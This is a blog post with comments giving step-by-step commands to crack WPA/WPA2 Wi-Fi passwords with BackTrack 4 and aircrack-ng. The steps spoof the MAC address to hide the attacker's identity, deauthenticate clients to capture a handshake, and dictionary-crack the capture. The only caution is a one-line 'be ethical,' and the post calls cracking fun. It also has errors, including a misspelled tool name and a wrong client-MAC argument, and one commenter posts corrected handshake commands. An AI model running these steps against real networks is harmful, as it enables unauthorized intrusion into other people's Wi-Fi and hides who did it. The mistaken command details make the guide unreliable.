Crack WPA/WPA2 with BT4

Please be ethical with knowledge

Cracking Wireless is fun. Its like a slap in the face to everyone who thinks wireless is safe. Hiding your SSID, MAC Filtering, and other tweaks will not keep you safe.

# ifconfig –a

find your WLAN if

# airman-ng stop <Wireless if>

# ifconfig <Wireless if> down

# macchanger mac <mac to use in the xx:xx:xx:xx:xx:xx form>

We change our MAC to hide our identity and if we want to bypass MAC filtering

# airodump-ng <wireless if>

This will discover APs in the area. Its a really neat powerful tool, play with it a little.

# airodump-ng –channel <channel> –w <file> –bssid <ssid in the form of XX:XX:XX:XX:XX:XX> <wireless if>

This will capture packets to a file you specify for a specific ssid on a specific channel

In a new shell…

aireplay-ng –0 10 –a <AP MAC> –c <AP MAC> <wireless if>

Wait for the ACK packets. This will only work if there are active hosts on the AP.

Now crack the dump with a brute force attack

aircrack-ng <file> –w <dict file>

If you need a dict file there is an existing one in /pentest/wireless/cowpatty/dict

8 Replies to “Crack WPA/WPA2 with BT4”

  1. @tomas
    Duh you noob. You want brute force then you need to try WEP, this is WPA and WPA2. Do some research before looking like a idiot.
    At least Carl had something useful to add.

  2. I wonder how con you crack a WPA key without getting a handshake from the connected clients …… Is it really possible .;)

  3. Ok, after running airmon-ng, airodump-ng and getting a handshake, I save the file, and call it “myhomeWPA-01.cap”. How do I save this file into my USB thumb drive if I am running BT4 on a live CD or a live USB drive? I want to save the file and open it later using Windows, so how do I do that? It seemed that whatever is written on the live CD is not saved when I log-off and reboot it again, the file is gone! I cannot find it. Where did the file go since I have issued a Write command to write to a file? Any ideas?

  4. This is wep!!!! you need a handshake to start a wpa crack! and a dictionary with the password in it to actually succeed with the cracking process…. there are other ways to crack ap if your allready online with hydra….. THIS IS WEP!!! I have done this many times, enough to have remembered the process!!!! and can tell you it is wep…. To capture a hand shake is aireplay-ng -0 5 -a insert bssid -c insert station id then your card in monitor mode(mon0)!!!! This afetr of course you start the capturing process! airodump-ng -c insert channel -w name of capture file -bssid insert bssid card in monitor mode(mon0)

Leave a Reply

Your email address will not be published. Required fields are marked *